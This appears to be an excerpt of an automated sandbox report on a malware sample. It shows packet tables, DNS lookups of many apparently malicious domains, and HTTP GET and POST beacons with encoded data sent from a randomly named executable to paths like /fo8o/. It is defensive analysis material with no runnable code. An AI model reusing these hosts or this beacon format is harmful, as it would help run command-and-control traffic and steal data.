                                                                            Nov 25, 2024 13:59:43.521828890 CET804998791.195.240.94192.168.2.11
                                                                            Nov 25, 2024 13:59:43.521848917 CET804998791.195.240.94192.168.2.11
                                                                            Nov 25, 2024 13:59:43.521853924 CET4998780192.168.2.1191.195.240.94
                                                                            Nov 25, 2024 13:59:43.521859884 CET804998791.195.240.94192.168.2.11
                                                                            Nov 25, 2024 13:59:43.521872044 CET804998791.195.240.94192.168.2.11
                                                                            Nov 25, 2024 13:59:43.521884918 CET4998780192.168.2.1191.195.240.94
                                                                            Nov 25, 2024 13:59:43.521923065 CET4998780192.168.2.1191.195.240.94
                                                                            Nov 25, 2024 13:59:43.521934032 CET804998791.195.240.94192.168.2.11
                                                                            Nov 25, 2024 13:59:43.521944046 CET804998791.195.240.94192.168.2.11
                                                                            Nov 25, 2024 13:59:43.521990061 CET4998780192.168.2.1191.195.240.94
                                                                            Nov 25, 2024 13:59:43.641900063 CET804998791.195.240.94192.168.2.11
                                                                            Nov 25, 2024 13:59:43.642215967 CET804998791.195.240.94192.168.2.11
                                                                            Nov 25, 2024 13:59:43.643091917 CET4998780192.168.2.1191.195.240.94
                                                                            Nov 25, 2024 13:59:43.713601112 CET804998791.195.240.94192.168.2.11
                                                                            Nov 25, 2024 13:59:43.713661909 CET804998791.195.240.94192.168.2.11
                                                                            Nov 25, 2024 13:59:43.713773966 CET4998780192.168.2.1191.195.240.94
                                                                            Nov 25, 2024 13:59:43.717819929 CET804998791.195.240.94192.168.2.11
                                                                            Nov 25, 2024 13:59:43.717863083 CET804998791.195.240.94192.168.2.11
                                                                            Nov 25, 2024 13:59:43.718941927 CET4998780192.168.2.1191.195.240.94
                                                                            Nov 25, 2024 13:59:43.724317074 CET804998791.195.240.94192.168.2.11
                                                                            Nov 25, 2024 13:59:43.724381924 CET804998791.195.240.94192.168.2.11
                                                                            Nov 25, 2024 13:59:43.724607944 CET4998780192.168.2.1191.195.240.94
                                                                            Nov 25, 2024 13:59:43.732739925 CET804998791.195.240.94192.168.2.11
                                                                            Nov 25, 2024 13:59:43.732826948 CET804998791.195.240.94192.168.2.11
                                                                            Nov 25, 2024 13:59:43.732944012 CET4998780192.168.2.1191.195.240.94
                                                                            Nov 25, 2024 13:59:43.741159916 CET804998791.195.240.94192.168.2.11
                                                                            Nov 25, 2024 13:59:43.741324902 CET4998780192.168.2.1191.195.240.94
                                                                            Nov 25, 2024 13:59:43.743443012 CET4998780192.168.2.1191.195.240.94
                                                                            Nov 25, 2024 13:59:43.863488913 CET804998791.195.240.94192.168.2.11
                                                                            Nov 25, 2024 13:59:57.716888905 CET4998880192.168.2.1166.29.149.46
                                                                            Nov 25, 2024 13:59:57.837034941 CET804998866.29.149.46192.168.2.11
                                                                            Nov 25, 2024 13:59:57.837157965 CET4998880192.168.2.1166.29.149.46
                                                                            Nov 25, 2024 13:59:57.840353966 CET4998880192.168.2.1166.29.149.46
                                                                            Nov 25, 2024 13:59:57.960504055 CET804998866.29.149.46192.168.2.11
                                                                            Nov 25, 2024 13:59:59.209700108 CET804998866.29.149.46192.168.2.11
                                                                            Nov 25, 2024 13:59:59.209837914 CET804998866.29.149.46192.168.2.11
                                                                            Nov 25, 2024 13:59:59.209892988 CET4998880192.168.2.1166.29.149.46
                                                                            Nov 25, 2024 13:59:59.345590115 CET4998880192.168.2.1166.29.149.46
                                                                            Nov 25, 2024 14:00:00.364411116 CET4998980192.168.2.1166.29.149.46
                                                                            Nov 25, 2024 14:00:00.484668016 CET804998966.29.149.46192.168.2.11
                                                                            Nov 25, 2024 14:00:00.485400915 CET4998980192.168.2.1166.29.149.46
                                                                            Nov 25, 2024 14:00:00.487298965 CET4998980192.168.2.1166.29.149.46
                                                                            Nov 25, 2024 14:00:00.607440948 CET804998966.29.149.46192.168.2.11
                                                                            Nov 25, 2024 14:00:01.779647112 CET804998966.29.149.46192.168.2.11
                                                                            Nov 25, 2024 14:00:01.779673100 CET804998966.29.149.46192.168.2.11
                                                                            Nov 25, 2024 14:00:01.783104897 CET4998980192.168.2.1166.29.149.46
                                                                            Nov 25, 2024 14:00:02.009668112 CET4998980192.168.2.1166.29.149.46
                                                                            Nov 25, 2024 14:00:03.031441927 CET4999080192.168.2.1166.29.149.46
                                                                            Nov 25, 2024 14:00:03.152528048 CET804999066.29.149.46192.168.2.11
                                                                            Nov 25, 2024 14:00:03.152709007 CET4999080192.168.2.1166.29.149.46
                                                                            Nov 25, 2024 14:00:03.154845953 CET4999080192.168.2.1166.29.149.46
                                                                            Nov 25, 2024 14:00:03.274871111 CET804999066.29.149.46192.168.2.11
                                                                            Nov 25, 2024 14:00:03.275060892 CET804999066.29.149.46192.168.2.11
                                                                            Nov 25, 2024 14:00:04.658452034 CET4999080192.168.2.1166.29.149.46
                                                                            Nov 25, 2024 14:00:04.695288897 CET804999066.29.149.46192.168.2.11
                                                                            Nov 25, 2024 14:00:04.695303917 CET804999066.29.149.46192.168.2.11
                                                                            Nov 25, 2024 14:00:04.695421934 CET4999080192.168.2.1166.29.149.46
                                                                            Nov 25, 2024 14:00:04.696996927 CET4999080192.168.2.1166.29.149.46
                                                                            Nov 25, 2024 14:00:04.933604002 CET804999066.29.149.46192.168.2.11
                                                                            Nov 25, 2024 14:00:04.933649063 CET804999066.29.149.46192.168.2.11
                                                                            Nov 25, 2024 14:00:04.933661938 CET4999080192.168.2.1166.29.149.46
                                                                            Nov 25, 2024 14:00:04.933698893 CET4999080192.168.2.1166.29.149.46
                                                                            Nov 25, 2024 14:00:05.679008007 CET4999180192.168.2.1166.29.149.46
                                                                            Nov 25, 2024 14:00:05.799226999 CET804999166.29.149.46192.168.2.11
                                                                            Nov 25, 2024 14:00:05.799376011 CET4999180192.168.2.1166.29.149.46
                                                                            Nov 25, 2024 14:00:05.803013086 CET4999180192.168.2.1166.29.149.46
                                                                            Nov 25, 2024 14:00:05.923257113 CET804999166.29.149.46192.168.2.11
                                                                            Nov 25, 2024 14:00:07.086117983 CET804999166.29.149.46192.168.2.11
                                                                            Nov 25, 2024 14:00:07.086193085 CET804999166.29.149.46192.168.2.11
                                                                            Nov 25, 2024 14:00:07.086272955 CET4999180192.168.2.1166.29.149.46
                                                                            Nov 25, 2024 14:00:07.089371920 CET4999180192.168.2.1166.29.149.46
                                                                            Nov 25, 2024 14:00:07.209363937 CET804999166.29.149.46192.168.2.11
                                                                            Nov 25, 2024 14:00:13.047543049 CET4999280192.168.2.11195.110.124.133
                                                                            Nov 25, 2024 14:00:13.167773008 CET8049992195.110.124.133192.168.2.11
                                                                            Nov 25, 2024 14:00:13.167867899 CET4999280192.168.2.11195.110.124.133
                                                                            Nov 25, 2024 14:00:13.170790911 CET4999280192.168.2.11195.110.124.133
                                                                            Nov 25, 2024 14:00:13.292329073 CET8049992195.110.124.133192.168.2.11
                                                                            Nov 25, 2024 14:00:14.523360014 CET8049992195.110.124.133192.168.2.11
                                                                            Nov 25, 2024 14:00:14.523385048 CET8049992195.110.124.133192.168.2.11
                                                                            Nov 25, 2024 14:00:14.523458004 CET4999280192.168.2.11195.110.124.133
                                                                            Nov 25, 2024 14:00:14.673930883 CET4999280192.168.2.11195.110.124.133
                                                                            Nov 25, 2024 14:00:15.692924023 CET4999380192.168.2.11195.110.124.133
                                                                            Nov 25, 2024 14:00:15.815735102 CET8049993195.110.124.133192.168.2.11
                                                                            Nov 25, 2024 14:00:15.815850973 CET4999380192.168.2.11195.110.124.133
                                                                            Nov 25, 2024 14:00:15.818893909 CET4999380192.168.2.11195.110.124.133
                                                                            Nov 25, 2024 14:00:15.939007998 CET8049993195.110.124.133192.168.2.11
                                                                            Nov 25, 2024 14:00:17.173274994 CET8049993195.110.124.133192.168.2.11
                                                                            Nov 25, 2024 14:00:17.173939943 CET8049993195.110.124.133192.168.2.11
                                                                            Nov 25, 2024 14:00:17.173996925 CET4999380192.168.2.11195.110.124.133
                                                                            Nov 25, 2024 14:00:17.330092907 CET4999380192.168.2.11195.110.124.133
                                                                            Nov 25, 2024 14:00:18.348663092 CET4999480192.168.2.11195.110.124.133
                                                                            Nov 25, 2024 14:00:18.468697071 CET8049994195.110.124.133192.168.2.11
                                                                            Nov 25, 2024 14:00:18.471292973 CET4999480192.168.2.11195.110.124.133
                                                                            Nov 25, 2024 14:00:18.473773956 CET4999480192.168.2.11195.110.124.133
                                                                            Nov 25, 2024 14:00:18.595228910 CET8049994195.110.124.133192.168.2.11
                                                                            Nov 25, 2024 14:00:18.595259905 CET8049994195.110.124.133192.168.2.11
                                                                            Nov 25, 2024 14:00:19.957062960 CET8049994195.110.124.133192.168.2.11
                                                                            Nov 25, 2024 14:00:19.957274914 CET8049994195.110.124.133192.168.2.11
                                                                            Nov 25, 2024 14:00:19.957461119 CET4999480192.168.2.11195.110.124.133
                                                                            Nov 25, 2024 14:00:19.986550093 CET4999480192.168.2.11195.110.124.133
                                                                            Nov 25, 2024 14:00:21.006345034 CET4999580192.168.2.11195.110.124.133
                                                                            Nov 25, 2024 14:00:21.126399040 CET8049995195.110.124.133192.168.2.11
                                                                            Nov 25, 2024 14:00:21.126512051 CET4999580192.168.2.11195.110.124.133
                                                                            Nov 25, 2024 14:00:21.129354000 CET4999580192.168.2.11195.110.124.133
                                                                            Nov 25, 2024 14:00:21.249666929 CET8049995195.110.124.133192.168.2.11
                                                                            Nov 25, 2024 14:00:22.539127111 CET8049995195.110.124.133192.168.2.11
                                                                            Nov 25, 2024 14:00:22.539376974 CET8049995195.110.124.133192.168.2.11
                                                                            Nov 25, 2024 14:00:22.539513111 CET4999580192.168.2.11195.110.124.133
                                                                            Nov 25, 2024 14:00:22.542223930 CET4999580192.168.2.11195.110.124.133
                                                                            Nov 25, 2024 14:00:22.665601015 CET8049995195.110.124.133192.168.2.11
                                                                            Nov 25, 2024 14:00:44.833990097 CET4999680192.168.2.11217.196.55.202
                                                                            Nov 25, 2024 14:00:44.954013109 CET8049996217.196.55.202192.168.2.11
                                                                            Nov 25, 2024 14:00:44.954108953 CET4999680192.168.2.11217.196.55.202
                                                                            Nov 25, 2024 14:00:44.956372976 CET4999680192.168.2.11217.196.55.202
                                                                            Nov 25, 2024 14:00:45.077910900 CET8049996217.196.55.202192.168.2.11
                                                                            Nov 25, 2024 14:00:46.264550924 CET8049996217.196.55.202192.168.2.11
                                                                            Nov 25, 2024 14:00:46.264569044 CET8049996217.196.55.202192.168.2.11
                                                                            Nov 25, 2024 14:00:46.264648914 CET4999680192.168.2.11217.196.55.202
                                                                            Nov 25, 2024 14:00:46.471210003 CET4999680192.168.2.11217.196.55.202
                                                                            Nov 25, 2024 14:00:47.490482092 CET4999780192.168.2.11217.196.55.202
                                                                            Nov 25, 2024 14:00:47.610723972 CET8049997217.196.55.202192.168.2.11
                                                                            Nov 25, 2024 14:00:47.610827923 CET4999780192.168.2.11217.196.55.202
                                                                            Nov 25, 2024 14:00:47.613682032 CET4999780192.168.2.11217.196.55.202
                                                                            Nov 25, 2024 14:00:47.735238075 CET8049997217.196.55.202192.168.2.11
                                                                            Nov 25, 2024 14:00:48.947330952 CET8049997217.196.55.202192.168.2.11
                                                                            Nov 25, 2024 14:00:48.948311090 CET8049997217.196.55.202192.168.2.11
                                                                            Nov 25, 2024 14:00:48.948375940 CET4999780192.168.2.11217.196.55.202
                                                                            Nov 25, 2024 14:00:49.127434969 CET4999780192.168.2.11217.196.55.202
                                                                            Nov 25, 2024 14:00:50.169662952 CET4999880192.168.2.11217.196.55.202
                                                                            Nov 25, 2024 14:00:50.290142059 CET8049998217.196.55.202192.168.2.11
                                                                            Nov 25, 2024 14:00:50.290347099 CET4999880192.168.2.11217.196.55.202
                                                                            Nov 25, 2024 14:00:50.292552948 CET4999880192.168.2.11217.196.55.202
                                                                            Nov 25, 2024 14:00:50.413336039 CET8049998217.196.55.202192.168.2.11
                                                                            Nov 25, 2024 14:00:50.414463997 CET8049998217.196.55.202192.168.2.11
                                                                            Nov 25, 2024 14:00:51.550539017 CET8049998217.196.55.202192.168.2.11
                                                                            Nov 25, 2024 14:00:51.550874949 CET8049998217.196.55.202192.168.2.11
                                                                            Nov 25, 2024 14:00:51.550940990 CET4999880192.168.2.11217.196.55.202
                                                                            Nov 25, 2024 14:00:51.799233913 CET4999880192.168.2.11217.196.55.202
                                                                            Nov 25, 2024 14:00:52.967183113 CET4999980192.168.2.11217.196.55.202
                                                                            Nov 25, 2024 14:00:53.088361025 CET8049999217.196.55.202192.168.2.11
                                                                            Nov 25, 2024 14:00:53.088454962 CET4999980192.168.2.11217.196.55.202
                                                                            Nov 25, 2024 14:00:53.091805935 CET4999980192.168.2.11217.196.55.202
                                                                            Nov 25, 2024 14:00:53.211870909 CET8049999217.196.55.202192.168.2.11
                                                                            Nov 25, 2024 14:00:54.381639004 CET8049999217.196.55.202192.168.2.11
                                                                            Nov 25, 2024 14:00:54.381864071 CET8049999217.196.55.202192.168.2.11
                                                                            Nov 25, 2024 14:00:54.382040024 CET4999980192.168.2.11217.196.55.202
                                                                            Nov 25, 2024 14:00:54.387250900 CET4999980192.168.2.11217.196.55.202
                                                                            Nov 25, 2024 14:00:54.580842972 CET8049999217.196.55.202192.168.2.11

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Nov 25, 2024 13:57:28.021522999 CET6102653192.168.2.111.1.1.1
                                                                            Nov 25, 2024 13:57:28.816713095 CET53610261.1.1.1192.168.2.11
                                                                            Nov 25, 2024 13:57:45.554446936 CET5914253192.168.2.111.1.1.1
                                                                            Nov 25, 2024 13:57:46.014693975 CET53591421.1.1.1192.168.2.11
                                                                            Nov 25, 2024 13:57:54.133539915 CET5811253192.168.2.111.1.1.1
                                                                            Nov 25, 2024 13:57:54.888262033 CET53581121.1.1.1192.168.2.11
                                                                            Nov 25, 2024 13:58:09.630122900 CET5906753192.168.2.111.1.1.1
                                                                            Nov 25, 2024 13:58:09.872528076 CET53590671.1.1.1192.168.2.11
                                                                            Nov 25, 2024 13:58:17.927496910 CET5624753192.168.2.111.1.1.1
                                                                            Nov 25, 2024 13:58:18.717443943 CET53562471.1.1.1192.168.2.11
                                                                            Nov 25, 2024 13:59:33.302844048 CET5954453192.168.2.111.1.1.1
                                                                            Nov 25, 2024 13:59:33.624432087 CET53595441.1.1.1192.168.2.11
                                                                            Nov 25, 2024 13:59:48.756108999 CET6176753192.168.2.111.1.1.1
                                                                            Nov 25, 2024 13:59:48.942253113 CET53617671.1.1.1192.168.2.11
                                                                            Nov 25, 2024 13:59:57.006448030 CET5264053192.168.2.111.1.1.1
                                                                            Nov 25, 2024 13:59:57.714406967 CET53526401.1.1.1192.168.2.11
                                                                            Nov 25, 2024 14:00:12.099365950 CET6435853192.168.2.111.1.1.1
                                                                            Nov 25, 2024 14:00:13.043665886 CET53643581.1.1.1192.168.2.11
                                                                            Nov 25, 2024 14:00:27.553694010 CET5213153192.168.2.111.1.1.1
                                                                            Nov 25, 2024 14:00:27.730515003 CET53521311.1.1.1192.168.2.11
                                                                            Nov 25, 2024 14:00:35.787493944 CET5649453192.168.2.111.1.1.1
                                                                            Nov 25, 2024 14:00:36.219679117 CET53564941.1.1.1192.168.2.11
                                                                            Nov 25, 2024 14:00:44.288427114 CET5058253192.168.2.111.1.1.1
                                                                            Nov 25, 2024 14:00:44.830367088 CET53505821.1.1.1192.168.2.11
                                                                            Nov 25, 2024 14:00:59.399292946 CET4922153192.168.2.111.1.1.1
                                                                            Nov 25, 2024 14:00:59.642165899 CET53492211.1.1.1192.168.2.11
                                                                            Nov 25, 2024 14:01:08.755623102 CET6205353192.168.2.111.1.1.1
                                                                            Nov 25, 2024 14:01:08.982534885 CET53620531.1.1.1192.168.2.11

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Nov 25, 2024 13:57:28.021522999 CET192.168.2.111.1.1.10x6d9fStandard query (0)www.3xfootball.comA (IP address)IN (0x0001)false
                                                                            Nov 25, 2024 13:57:45.554446936 CET192.168.2.111.1.1.10x940bStandard query (0)www.kasegitai.tokyoA (IP address)IN (0x0001)false
                                                                            Nov 25, 2024 13:57:54.133539915 CET192.168.2.111.1.1.10x8d91Standard query (0)www.goldenjade-travel.comA (IP address)IN (0x0001)false
                                                                            Nov 25, 2024 13:58:09.630122900 CET192.168.2.111.1.1.10x6c29Standard query (0)www.antonio-vivaldi.mobiA (IP address)IN (0x0001)false
                                                                            Nov 25, 2024 13:58:17.927496910 CET192.168.2.111.1.1.10xdde9Standard query (0)www.magmadokum.comA (IP address)IN (0x0001)false
                                                                            Nov 25, 2024 13:59:33.302844048 CET192.168.2.111.1.1.10xd34eStandard query (0)www.rssnewscast.comA (IP address)IN (0x0001)false
                                                                            Nov 25, 2024 13:59:48.756108999 CET192.168.2.111.1.1.10x4fbfStandard query (0)www.liangyuen528.comA (IP address)IN (0x0001)false
                                                                            Nov 25, 2024 13:59:57.006448030 CET192.168.2.111.1.1.10xd3baStandard query (0)www.techchains.infoA (IP address)IN (0x0001)false
                                                                            Nov 25, 2024 14:00:12.099365950 CET192.168.2.111.1.1.10x67e8Standard query (0)www.elettrosistemista.zipA (IP address)IN (0x0001)false
                                                                            Nov 25, 2024 14:00:27.553694010 CET192.168.2.111.1.1.10x95f5Standard query (0)www.donnavariedades.comA (IP address)IN (0x0001)false
                                                                            Nov 25, 2024 14:00:35.787493944 CET192.168.2.111.1.1.10xf128Standard query (0)www.660danm.topA (IP address)IN (0x0001)false
                                                                            Nov 25, 2024 14:00:44.288427114 CET192.168.2.111.1.1.10xbfc7Standard query (0)www.empowermedeco.comA (IP address)IN (0x0001)false
                                                                            Nov 25, 2024 14:00:59.399292946 CET192.168.2.111.1.1.10xbe29Standard query (0)www.joyesi.xyzA (IP address)IN (0x0001)false
                                                                            Nov 25, 2024 14:01:08.755623102 CET192.168.2.111.1.1.10xcdb5Standard query (0)www.k9vyp11no3.cfdA (IP address)IN (0x0001)false

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Nov 25, 2024 13:57:28.816713095 CET1.1.1.1192.168.2.110x6d9fNo error (0)www.3xfootball.com154.215.72.110A (IP address)IN (0x0001)false
                                                                            Nov 25, 2024 13:57:46.014693975 CET1.1.1.1192.168.2.110x940bName error (3)www.kasegitai.tokyononenoneA (IP address)IN (0x0001)false
                                                                            Nov 25, 2024 13:57:54.888262033 CET1.1.1.1192.168.2.110x8d91No error (0)www.goldenjade-travel.com116.50.37.244A (IP address)IN (0x0001)false
                                                                            Nov 25, 2024 13:58:09.872528076 CET1.1.1.1192.168.2.110x6c29Name error (3)www.antonio-vivaldi.mobinonenoneA (IP address)IN (0x0001)false
                                                                            Nov 25, 2024 13:58:18.717443943 CET1.1.1.1192.168.2.110xdde9No error (0)www.magmadokum.comredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                            Nov 25, 2024 13:58:18.717443943 CET1.1.1.1192.168.2.110xdde9No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                            Nov 25, 2024 13:58:18.717443943 CET1.1.1.1192.168.2.110xdde9No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                            Nov 25, 2024 13:59:33.624432087 CET1.1.1.1192.168.2.110xd34eNo error (0)www.rssnewscast.com91.195.240.94A (IP address)IN (0x0001)false
                                                                            Nov 25, 2024 13:59:48.942253113 CET1.1.1.1192.168.2.110x4fbfName error (3)www.liangyuen528.comnonenoneA (IP address)IN (0x0001)false
                                                                            Nov 25, 2024 13:59:57.714406967 CET1.1.1.1192.168.2.110xd3baNo error (0)www.techchains.info66.29.149.46A (IP address)IN (0x0001)false
                                                                            Nov 25, 2024 14:00:13.043665886 CET1.1.1.1192.168.2.110x67e8No error (0)www.elettrosistemista.zipelettrosistemista.zipCNAME (Canonical name)IN (0x0001)false
                                                                            Nov 25, 2024 14:00:13.043665886 CET1.1.1.1192.168.2.110x67e8No error (0)elettrosistemista.zip195.110.124.133A (IP address)IN (0x0001)false
                                                                            Nov 25, 2024 14:00:27.730515003 CET1.1.1.1192.168.2.110x95f5Name error (3)www.donnavariedades.comnonenoneA (IP address)IN (0x0001)false
                                                                            Nov 25, 2024 14:00:36.219679117 CET1.1.1.1192.168.2.110xf128Name error (3)www.660danm.topnonenoneA (IP address)IN (0x0001)false
                                                                            Nov 25, 2024 14:00:44.830367088 CET1.1.1.1192.168.2.110xbfc7No error (0)www.empowermedeco.comempowermedeco.comCNAME (Canonical name)IN (0x0001)false
                                                                            Nov 25, 2024 14:00:44.830367088 CET1.1.1.1192.168.2.110xbfc7No error (0)empowermedeco.com217.196.55.202A (IP address)IN (0x0001)false
                                                                            Nov 25, 2024 14:00:59.642165899 CET1.1.1.1192.168.2.110xbe29Name error (3)www.joyesi.xyznonenoneA (IP address)IN (0x0001)false
                                                                            Nov 25, 2024 14:01:08.982534885 CET1.1.1.1192.168.2.110xcdb5Name error (3)www.k9vyp11no3.cfdnonenoneA (IP address)IN (0x0001)false

                                                                            HTTP Request Dependency Graph

                                                                            • www.3xfootball.com
                                                                            • www.goldenjade-travel.com
                                                                            • www.magmadokum.com
                                                                            • www.rssnewscast.com
                                                                            • www.techchains.info
                                                                            • www.elettrosistemista.zip
                                                                            • www.empowermedeco.com

                                                                            HTTP Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.1149764154.215.72.110803796C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 25, 2024 13:57:28.947613001 CET507OUTGET /fo8o/?HpnH2=lZrlsdK8B4Q&zh=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KAVMa+YMk7oXS5ptBuz0n8hBJ8/Hksw4c= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Host: www.3xfootball.com
                                                                            Connection: close
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Nov 25, 2024 13:57:30.494777918 CET691INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Mon, 25 Nov 2024 12:57:30 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 548
                                                                            Connection: close
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.1149822116.50.37.244803796C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 25, 2024 13:57:55.013698101 CET794OUTPOST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.goldenjade-travel.com
                                                                            Origin: http://www.goldenjade-travel.com
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Referer: http://www.goldenjade-travel.com/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 7a 68 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 50 50 7a 4e 6b 71 64 71 73 48 6e 59 57 6a 72 30 4f 47 34 69 4f 6a 54 77 41 52 5a 5a 4d 4e 6d 50 57 67 3d 3d
                                                                            Data Ascii: zh=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfPPzNkqdqsHnYWjr0OG4iOjTwARZZMNmPWg==
                                                                            Nov 25, 2024 13:57:56.584685087 CET492INHTTP/1.1 404 Not Found
                                                                            Content-Type: text/html; charset=us-ascii
                                                                            Server: Microsoft-HTTPAPI/2.0
                                                                            Date: Mon, 25 Nov 2024 12:57:55 GMT
                                                                            Connection: close
                                                                            Content-Length: 315
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.1149831116.50.37.244803796C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
